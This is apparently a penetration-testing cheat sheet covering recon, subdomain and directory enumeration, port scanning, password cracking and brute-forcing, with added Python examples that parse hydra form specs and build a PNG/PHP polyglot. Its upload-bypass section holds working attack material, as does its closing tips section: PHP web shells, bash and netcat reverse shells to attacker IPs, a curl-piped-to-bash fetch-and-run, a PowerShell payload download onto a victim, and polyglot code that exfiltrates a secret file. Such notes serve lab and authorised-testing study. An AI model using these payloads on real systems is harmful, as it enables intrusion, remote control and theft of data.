Recon phase
- Review latest [acquisitions](https://www.crunchbase.com/)
- Get relationships by registrants ([viewdns](https://viewdns.info/reversewhois/))
- Widen to medium scope for each domain found (subdomain and content enumeration below)
On a small domain (one-liner)
- subfinder -d domainname.com | httpx | gau | uro | gf lfi | tee save-file.txt //subdomains -> live hosts -> archived URLs -> dedupe -> LFI-looking params
DnsDump
Subdomain Enum
- amass enum -d clicktheclapbutton50timesplz.com
- sublist3r -d techyrick.com -o file.txt
- subfinder -d domain.com -all -silent
- assetfinder domain.com
- gobuster vhost -u http://thetoppers.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain //subdomain
- echo domain.com | waybackurls | unfurl -u domains
- gau --subs example.com | unfurl -u domains
- crt.sh
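The `unfurl -u domains` step above reduces a pile of archived URLs to unique hostnames, and the result should then be filtered to the target's scope. The following is an added example (not the page's or any listed tool's code) that does both in plain Python. The URL lines are constructed to look like `waybackurls`/`gau` output, and the root domain `example.com` is assumed. The scope check is done on a label boundary: a naive `endswith("example.com")` would also accept lookalikes such as `example.com.evil-phish.net`.

```python
from urllib.parse import urlsplit

# Constructed sample of what `waybackurls` / `gau --subs` print for a scope
SAMPLE_URLS = """\
https://www.example.com/login?next=/
http://api.example.com:8080/v1/users
https://dev.example.com/.git/config
https://example.com.evil-phish.net/example.com/
https://cdn.otherdomain.org/static/app.js
example.com/robots.txt
https://ADMIN.example.com/
"""


def in_scope(host: str, root: str) -> bool:
    """Label-based scope check: host is root itself or a subdomain of root.

    Comparing on the dot boundary rejects 'example.com.evil-phish.net',
    which a plain endswith(root) test would wrongly keep.
    """
    host, root = host.lower().rstrip("."), root.lower().rstrip(".")
    return host == root or host.endswith("." + root)


def extract_hosts(raw: str, root: str) -> list[str]:
    """Equivalent of `unfurl -u domains` plus an in-scope filter.

    Returns sorted unique hostnames; ports are dropped and case is folded,
    which is what urlsplit().hostname already does.
    """
    hosts = set()
    for line in raw.splitlines():
        line = line.strip()
        if not line:
            continue
        if "://" not in line:  # bare host/path lines without a scheme
            line = "http://" + line
        host = urlsplit(line).hostname
        if host and in_scope(host, root):
            hosts.add(host)
    return sorted(hosts)


if __name__ == "__main__":
    for h in extract_hosts(SAMPLE_URLS, "example.com"):
        print(h)
```

Feed real output in with `cat urls.txt | python3 hosts.py` style piping once the constructed sample is replaced by `sys.stdin.read()`; the in-scope list is what goes into `httpx` next.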
Technologies
Content Discovery
- crawley -all -cookie "security=low; PHPSESSID=mlhjkmo9l7slsf8g548pnd4pjn" http://localhost/dvwa > io.txt
- ffuf -u http://URL/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -mc 200,302
- wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404,302,301 http://10.129.206.31/FUZZ.php
- gobuster dir -u http://url/ -w wordlists -x php,txt,js -k //-k skips TLS certificate checks (for SSL)
- dirsearch
Parameters
- ffuf -w /path/to/paramnames.txt -u https://target/script.php?FUZZ=test_value -fs 4242 //-fs drops responses of the baseline size
- Param Miner (Burp extension)
- x8
sub-domain_takeover
- subzy: ./subzy run --targets list.txt
- can-i-take-over-xyz (GitHub repo of takeover fingerprints per service)
==========================================Automation and Collected Commands==========================================
Curl
- curl -X OPTIONS -I http://URL //allowed HTTP methods come back in the Allow header
ffuf
- ffuf -u http://URL/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -mc 200,302
- ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.10.11.23 -H "Host: FUZZ.permx.htb" -mc 200 -s
Wfuzz
- wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404,302,301 http://10.129.206.31/FUZZ.php
gobuster [subdomain]
- gobuster vhost -u http://thetoppers.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain //subdomain
amass
- amass enum -d clicktheclapbutton50timesplz.com
sublist3r
- sublist3r -d techyrick.com -o file.txt
- sublist3r -d techyrick.com -b
nslookup
- $ nslookup example.com
- $ nslookup $ip$ //reverse lookup
- $ nslookup $ip$ $ip$ //reverse lookup, using the target itself as the DNS server
dig
- dig axfr cronos.htb @10.10.10.13 //zone transfer attempt
- dig -x 10.10.10.13 @10.10.10.13 //reverse lookup against the target's own resolver
zip2john
- zip2john your_file.zip > zip.hash
Whatweb
- whatweb http://URL -v
nmap
- nmap -sn 192.168.1.0/24 //scan networks
- nmap --top-ports 1000 $ip
- nmap -iL list.txt
- nmap -A -T4 cloudflare.co
- nmap -sV localhost
- nmap -p- -Pn -vv -T4 -n $ip //-Pn skips host discovery, -n skips DNS resolution
- nmap --top-ports 100 -A -sV -T4 $ip
- sudo nmap -sSVC -p-10000 $ip$
rustscan (fast port scanner, hands the open ports to nmap after --)
- rustscan -a 10.129.184.36 --ulimit 5000 -- -A
tcpdump
- tcpdump -i tun0 port 1389
bettercap
- sudo bettercap
- net.probe on
- net.show
waybackurls
- cat program.txt | waybackurls >> urls.txt //For target scope
Impacket SMB server
- sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali . //shares the current directory as "kali"
- on the victim: copy \\10.21.28.143\kali\reverse.exe C:\PrivEsc\reverse.exe
nuclei
- cat program.txt | nuclei
password
- mkpasswd -m sha-512 Password1234
John the Ripper
- john --wordlist=/usr/share/wordlists/rockyou.txt john.txt
- john john.txt --show
Docker
- sudo docker run --rm -it $image-name$
Metasploit
- search type:exploit name:smb platform:windows
searchsploit
searchsploit -m %path/file%
Download a file onto the victim (from your web server)
- powershell "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.105:8000/MS10-059.exe', 'MS10-059.exe')"
PayLoad
- msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=
hydra
- hydra -l none -P rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" -t 64 -V
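The `https-post-form` argument above is three colon-separated fields: the path, the POST body with `^USER^`/`^PASS^` placeholders, and a condition string that is treated as a failure marker unless prefixed with `S=` (success) or `F=` (failure). The following added example (not hydra's code, and not from the page) parses that spec and scores constructed responses the same way, including the case practitioners get burned by: a lockout or WAF page that contains no failure string at all is counted as a hit, which is why `-V` and manual confirmation matter. Form-encoding the substituted values is this example's choice.

```python
from urllib.parse import quote_plus

# The spec from the hydra line above: path : POST body : condition string
HYDRA_SPEC = ("/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true"
              ":Incorrect password")

# Constructed responses standing in for the target's real pages
FAIL_PAGE = "<html><body><div class='err'>Incorrect password</div></body></html>"
OK_PAGE = "<html><head><meta http-equiv='refresh' content='0;url=/db/'></head></html>"
LOCKOUT_PAGE = ""  # e.g. a lockout/WAF that answers with an empty 200


def parse_form_spec(spec: str) -> dict:
    """Split a hydra http-post-form spec into path, body template and condition.

    The third field is a failure string by default; 'S=' makes it a success
    string, 'F=' an explicit failure string. Any later ':H=...' header fields
    are ignored by this example.
    """
    parts = spec.split(":", 2)
    if len(parts) != 3:
        raise ValueError("expected path:body:condition")
    path, body, cond = parts
    cond = cond.split(":", 1)[0]
    if cond.startswith("S="):
        mode, needle = "success", cond[2:]
    elif cond.startswith("F="):
        mode, needle = "failure", cond[2:]
    else:
        mode, needle = "failure", cond
    return {"path": path, "body": body, "mode": mode, "needle": needle}


def render_body(template: str, user: str, password: str) -> str:
    """Substitute ^USER^ and ^PASS^ into the body, form-encoding the values."""
    return (template.replace("^USER^", quote_plus(user))
                    .replace("^PASS^", quote_plus(password)))


def login_succeeded(spec: dict, response_body: str) -> bool:
    """Score one guess the way the condition string is applied:
    failure mode -> success when the marker is absent,
    success mode -> success when the marker is present."""
    if spec["mode"] == "failure":
        return spec["needle"] not in response_body
    return spec["needle"] in response_body


if __name__ == "__main__":
    spec = parse_form_spec(HYDRA_SPEC)
    print("POST", spec["path"], render_body(spec["body"], "", "Password1234"))
    for name, page in [("fail", FAIL_PAGE), ("ok", OK_PAGE), ("lockout", LOCKOUT_PAGE)]:
        print(f"{name:8s} -> {'HIT' if login_succeeded(spec, page) else 'miss'}")
```

The lockout page scoring as a HIT is the point: with a failure-string condition, anything that is not the normal error page looks like a valid login, so prefer `S=` with a string only the post-login page contains when the application offers one.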
crackmapexec
- crackmapexec smb solarlab.htb -u blake -p pass.txt
wpscan
- wpscan --url example.com
HttpX
- httpx -sc -td -title -fhr -location -pa //status code, tech detect, title, follow host redirects, Location header, probe all IPs
For IIS use shortscan (8.3 short-name enumeration)
- shortscan https://example.url.com/
Collect IPs
- shodan.io
- Censys, FOFA, ZoomEye (use all of them)
File permissions
- chmod a+rx filename
- sudo chown www-data: /file/path/
file_uploadbypass
========================
.htaccess trick: upload an .htaccess that maps a new extension to PHP, then upload the shell with that extension
Content-Disposition: form-data; name="avatar"; filename=".htaccess"
Content-Type: text/plain

AddType application/x-httpd-php .tez
========================
Spoof the MIME type in the multipart part header
Content-Type: image/jpeg
========================
Polyglot: a valid image with PHP in the metadata comment, saved with a .php name
exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" ink.png -o polyglot.php
========================
Null byte in the filename (ends the name early for the extension check)
test.php%00.jpg
========================
Lab: Web shell upload via race condition (request the file in the window before the server-side check removes it)
========================
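The exiftool polyglot above works because the upload check only looks at the image header (or parses the image) while the PHP interpreter only cares about what sits between `<?php` and `?>`. The following added example (not the page's code and not exiftool) builds the same kind of file from scratch with the standard library: a valid 1x1 PNG whose `tEXt` Comment chunk carries the PHP payload. It then shows the two sides: a signature check and even a CRC-validating chunk parser both accept the file, and a hardening step that rebuilds the image from its essential chunks only drops the payload. Chunk layout and the assumption that exiftool writes Comment as a `tEXt` chunk are this example's; the payload string is the one from the page.

```python
import struct
import zlib

PHP_PAYLOAD = b"<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>"
PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """PNG chunk: 4-byte big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_polyglot(payload: bytes, width: int = 1, height: int = 1) -> bytes:
    """Minimal valid 8-bit RGB PNG with the payload in a tEXt 'Comment' chunk.

    The payload sits in metadata, not pixel data, so the image decodes fine;
    once the file is stored with a .php name the interpreter runs the tag.
    """
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # depth 8, colour type 2 (RGB)
    raw = b"".join(b"\x00" + b"\xff\x00\x00" * width for _ in range(height))  # filter 0 + red pixels
    idat = zlib.compress(raw)
    text = b"Comment\x00" + payload  # tEXt = keyword, NUL, Latin-1 text
    return (PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"tEXt", text)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))


def looks_like_png(blob: bytes) -> bool:
    """What a magic-byte / getimagesize-style upload check verifies: the signature only."""
    return blob.startswith(PNG_SIG)


def chunks(blob: bytes) -> list[tuple[bytes, bytes]]:
    """Walk the chunk list, verifying every CRC; returns [(type, data), ...].

    A stricter validator than a magic-byte check, and it still accepts the polyglot.
    """
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, out = len(PNG_SIG), []
    while pos < len(blob):
        (length,) = struct.unpack(">I", blob[pos:pos + 4])
        ctype = blob[pos + 4:pos + 8]
        data = blob[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", blob[pos + 8 + length:pos + 12 + length])
        if crc != zlib.crc32(ctype + data) & 0xFFFFFFFF:
            raise ValueError("bad CRC in " + ctype.decode("ascii", "replace"))
        out.append((ctype, data))
        pos += 12 + length
    return out


def strip_metadata(blob: bytes) -> bytes:
    """Hardening: re-emit only the chunks an image needs, dropping ancillary
    text chunks and the payload with them. Pair this with storing uploads
    under a server-chosen name and outside any PHP-executed path."""
    keep = {b"IHDR", b"PLTE", b"IDAT", b"IEND"}
    return PNG_SIG + b"".join(_chunk(t, d) for t, d in chunks(blob) if t in keep)


if __name__ == "__main__":
    polyglot = build_polyglot(PHP_PAYLOAD)
    print("signature check passes:", looks_like_png(polyglot))
    print("chunk types:", [t.decode() for t, _ in chunks(polyglot)])
    print("payload present:", PHP_PAYLOAD in polyglot)
    clean = strip_metadata(polyglot)
    print("after strip, payload present:", PHP_PAYLOAD in clean)
```

Writing `polyglot` to `polyglot.php` reproduces the exiftool result; the stripped copy is what a safer upload handler would persist instead of the bytes it received.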
==========================================NOTE & TIPS==========================================
DOMAINS divide into ==> info, api, dev, admin, stage, ...
etc on Windows ==> C:\Windows\System32\drivers\etc\   (hosts file lives here; there is no passwd file on Windows)
ssh on Windows ==> C:\Users\YourUsername\.ssh
Shell_UP ==> python3 -c 'import pty;pty.spawn("/bin/bash")'
Shell_UP ==> script /dev/null -c bash
shell.sh ==> bash -c 'bash -i >& /dev/tcp/10.10.16.49/5555 0>&1'
shell.php ==> <?php system($_GET["cmd"]); ?>
shell.php ==> <?php echo shell_exec($_GET['e'].' 2>&1'); ?>
shell ==> nc -e /bin/bash 10.10.10.10 5555   (needs a netcat build that supports -e)
shell.sh ==>
#!/bin/bash
bash -i >& /dev/tcp/10.21.28.143/5555 0>&1
THEN ==>
http://site.htb/shell.php?cmd=curl%20:8000/shell.sh|bash   (attacker IP goes before :8000)